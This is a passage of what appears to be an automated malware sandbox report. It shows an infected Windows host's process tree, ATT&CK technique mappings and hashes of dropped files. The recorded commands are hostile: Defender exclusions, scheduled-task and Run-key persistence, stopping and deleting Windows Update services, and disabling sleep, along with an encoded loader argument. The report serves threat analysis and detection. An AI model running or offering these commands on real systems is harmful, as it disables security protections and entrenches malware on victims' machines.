        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:5040
    - - C:\Users\Admin\AppData\Local\Temp\1000004001\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\setup.exe"
        5⤵
        
        PID:3748
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 668
        6⤵
        Program crash
        
        PID:3584
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 924
        6⤵
        Program crash
        
        PID:5332
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 980
        6⤵
        Program crash
        
        PID:1196
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1004
        6⤵
        Program crash
        
        PID:4292
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1012
        6⤵
        Program crash
        
        PID:3640
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1128
        6⤵
        Program crash
        
        PID:3228
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1272
        6⤵
        Program crash
        
        PID:5552
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1280
        6⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4900
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 1272
        6⤵
        Program crash
        
        PID:5044
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\toolspub2.exe"
        5⤵
        
        PID:5728
      - C:\Users\Admin\AppData\Local\Temp\1000005001\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\toolspub2.exe"
        6⤵
        
        PID:1072
    - - C:\Users\Admin\AppData\Local\Temp\1000020001\XandETC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000020001\XandETC.exe"
        5⤵
        
        PID:5980
- C:\Users\Admin\AppData\Local\Temp\a\Doej4oa.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Doej4oa.exe"
  2⤵
  PID:3912
- - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    3⤵
    PID:5212
- C:\Users\Admin\AppData\Local\Temp\a\azu641.exe
  "C:\Users\Admin\AppData\Local\Temp\a\azu641.exe"
  2⤵
  PID:4264
- C:\Users\Admin\AppData\Local\Temp\a\644.exe
  "C:\Users\Admin\AppData\Local\Temp\a\644.exe"
  2⤵
  PID:2120
- C:\Users\Admin\AppData\Local\Temp\a\foto164.exe
  "C:\Users\Admin\AppData\Local\Temp\a\foto164.exe"
  2⤵
  PID:5356
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x9047029.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x9047029.exe
    3⤵
    PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\h8193536.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\h8193536.exe
      4⤵
      PID:5720
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i2515424.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i2515424.exe
    3⤵
    PID:4256
- C:\Users\Admin\AppData\Local\Temp\a\fotod75.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fotod75.exe"
  2⤵
  PID:1532
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y4760738.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y4760738.exe
    3⤵
    PID:1776
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y4369071.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y4369071.exe
      4⤵
      PID:932
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\y6055727.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\y6055727.exe
        5⤵
        
        PID:4448
      - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\j3813602.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\j3813602.exe
        6⤵
        
        PID:4804
      - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\k1638398.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\k1638398.exe
        6⤵
        
        PID:3844
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l6669558.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l6669558.exe
        5⤵
        
        PID:1408
  - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\m5395202.exe
      C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\m5395202.exe
      4⤵
      PID:4056
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\n9850450.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\n9850450.exe
    3⤵
    PID:4852
- C:\Users\Admin\AppData\Local\Temp\a\minuscrypt_crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\a\minuscrypt_crypted.exe"
  2⤵
  PID:2528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 152
    3⤵
    - Program crash
    PID:2736
- C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe"
  2⤵
  PID:5432
- - C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe"
    3⤵
    PID:3120

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x344
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3008

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Public
1⤵
PID:1080
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Public
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1148

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5872

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5992

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6020

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1372

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:836

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5508

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4216

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3604

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5988

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5692

C:\Users\Admin\AppData\Roaming\fjucfrs
C:\Users\Admin\AppData\Roaming\fjucfrs
1⤵
PID:5928

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:2552

C:\Users\Admin\AppData\Roaming\evucfrs
C:\Users\Admin\AppData\Roaming\evucfrs
1⤵
PID:5812
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5812 -s 480
  2⤵
  - Program crash
  PID:3508

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\j3813602.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\j3813602.exe
1⤵
PID:5252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
1⤵
PID:1596

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5780
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:4908
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:3804
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:5712
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5556

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:1748
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5700
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3744
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6052
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:1852
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:3768
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:2744
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:4220
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:6060
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:2804
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:5560

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:5804

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
1⤵
PID:5296
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
  2⤵
  PID:4264

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:4280

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
PID:4136
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3640
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1744
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:668
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5604
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5780
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Suspicious use of SetThreadContext
    - Launches sc.exe
    PID:216
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3424
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4112
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1460
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:5048
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:4188

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:6004
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:4324
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:4344
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:2892
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
1⤵
PID:2632

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:5716

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe zuhwtyqtfkk
1⤵
PID:2892

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:2256

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
PID:5724
- C:\Windows\System32\Wbem\WMIC.exe
  wmic PATH Win32_VideoController GET Name, VideoProcessor
  2⤵
  - Detects videocard installed
  PID:5200

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
1⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x5271176.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x5271176.exe
1⤵
PID:3084
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f0699091.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f0699091.exe
  2⤵
  - Executes dropped EXE
  PID:3912
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\g7031948.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\g7031948.exe
  2⤵
  PID:2168

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:3376

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:3672

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:5256

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:4208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

Modify Registry

Scripting

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
696B

MD5
1bdced589ec8998c1c467a83e817d6cc

SHA1
2790868e34c343c79354e98ebd67282d719a6c63

SHA256
d8f9e6a80aeeb6b002cb9702884360f28425f9278bd613affdf5a5f1e0673aa0

SHA512
3f32ef42fd1084807b1de23ccde7061b26b9863da93a71bb7e6b06f9ad404bbfa4a3f6a2003d2f8b7c555b79c264cdb716ce67d5d30bf7c6930a993de742e24d

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
1KB

MD5
02bb668b56598448d31b763e841cf659

SHA1
d0eb39585d0f564973efbe32752eb8ff474b03eb

SHA256
f38705ccb3d758c29951c2153d63093dbfb83ed9881b858dc2557246fa9993c8

SHA512
68622957edd7df35cd746bcb691321c596e0fc5d4a553867cca6ebfb7a26756340843ef412cf2939631cb13d6ecd2148947620b0312d30e544a381c30bf5a4b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Filesize
1KB

MD5
2f5fe5f37e80ac7535fcb9aba7850cb8

SHA1
c0f3caa6869c15686ca82283c6e6f938cc07dd68

SHA256
a2d3605e72db38551716278707190e33074afaaa787659fcadbf2a0a9de48dc1

SHA512
2d8f17ff2d9dbad1cd786145d84aa4efb56d318be948cbfa103deaa87369cf85251e9229276cec5a6e8cd1f9543f6f796c66e5f558d9370e95251cc2bc710623

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f

SHA1
cc38cfcd0b4265eb2200f105c9ae46b3809beb72

SHA256
b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a

SHA512
ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
42352a7aa788ddd8928bfca73b18d100

SHA1
550e3fd88f0afbf19c2fca917365df3c0c29a85e

SHA256
f6d6224131234cff584f6a22ffeffdf239bff755d026ff4646067ebf8b4621d1

SHA512
c5894508e186a5f50a8345cf329fa919efb699a0302cdd74e1d93610fc5759d138e1f9dbbff6b570dadce98f0892492d308e12a7931555b205a3507a1b898e31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
62634de5dc858033aa40a4c53bfca38b

SHA1
9d194264f49e1a8cf951e4aafde0ac932e2b954d

SHA256
92d13228fbfe4c1782f5987727120aeddb7bdb75113acc4a89eb8d0d951b12bd

SHA512
491ef8eb80a3a41f99b056adaa026f2b7fde47e2b416aadb3d9846f62c019a65ca52025a50a2b411e585012ef48784b38c30bfeab7e46f922687ad2d98454f6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe

Filesize
4.1MB

MD5
d82f58a3a66392e427af0c1ed193a436

SHA1
9400a04b6723f3c338dc783ee1f042c38b0ef7bb

SHA256
8b0bc6d4b66528046bbb615a4749d3f8de40587632fc98e16264d39644f2839f

SHA512
8fd988b26e6c15bb35820ee880fc910bd765d7a7cd0776c370133a236ce9b1f4d558f922efb538a9e98c5c5d5c3a49a0cf4df59b7ea1383152cb15b824913fdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000004001\setup.exe

Filesize
276KB

MD5
94a8cb37cf0aa2d1fedb893167f4dc67

SHA1
08b2d1d0ff9c73128faa4180377c7f1a0290252b

SHA256
0c66455c62f9e8d2755760f97d5e51e26267682cc9a6ec15bae1f1d0bbeaaa65

SHA512
52475d7a08673be460b4429692043aee04b1db9b6a700c96760d55bd339234574d8b739e8920fcb617da35a863eab1c21451b3b5b1fc5b2f85a25facc2c6a075

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005001\toolspub2.exe

Filesize
205KB

MD5
46a85f9fb354c4a5c4ea7a321ee9c3b9

SHA1
ff3e925a9463283888189692865775205a0976a9

SHA256
cb3bc1b8b740f2b21baf6567c68cc9aaf7038b7e5394385a8c5d4b45cd433af4

SHA512
acbb500bbd9940f96c50292f4ecf8267e69730dc1db7fc33763a7f5d7afd353b572c2b687b1f63eb434501fd9c1fc315796da36a37cbb6425d42fa7d52f1fc22

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000007051\foto164.exe

Filesize
586KB

MD5
60ada011a81372aecb897e05f53c31c4

SHA1
c2a41fce0521ca43f34d95d3c3b96befd277224b

SHA256
e32c18db594d5ff7048d8b321f8707ae41c9e826ee745a07caaf3b7860a1d0c6

SHA512
de6e5422dd511e4e1a496c99d79d48405acc323da9b65e170fd6e43310379ac27e07f8348a8bba9172c66a8706a0fdacb5cc201eeb437d437d4edaec4c3853ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000008051\fotod75.exe

Filesize
731KB

MD5
c3a2ccc38624d2c29c1519dcc54884fb

SHA1
ff43c27995bdce7d46ace3363bb0a8f5428d9359

SHA256
5a0503549c6d5759acd451af0b85d263feb7945ca92104b25705528db8dbd1e6

SHA512
2d7d7d9a9cabb4b6f80cbe387dccb58b83b653b0e2e389e8a3ddc57fd2a173ab618bebb304b9c211a485280ee0e71708561b7b7464856da27e1b9f6793fcb7a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000020001\XandETC.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v6674595.exe

Filesize
597KB

MD5
c59608717a269ba701bc278010c6fbcf

SHA1
1658801b62f7609917fea237a113e18120cc0c2a

SHA256
3dc7cc84ae7ac14b69d8dc73461f26ec2ed89ff7a960b819944eda960b2d5879

SHA512
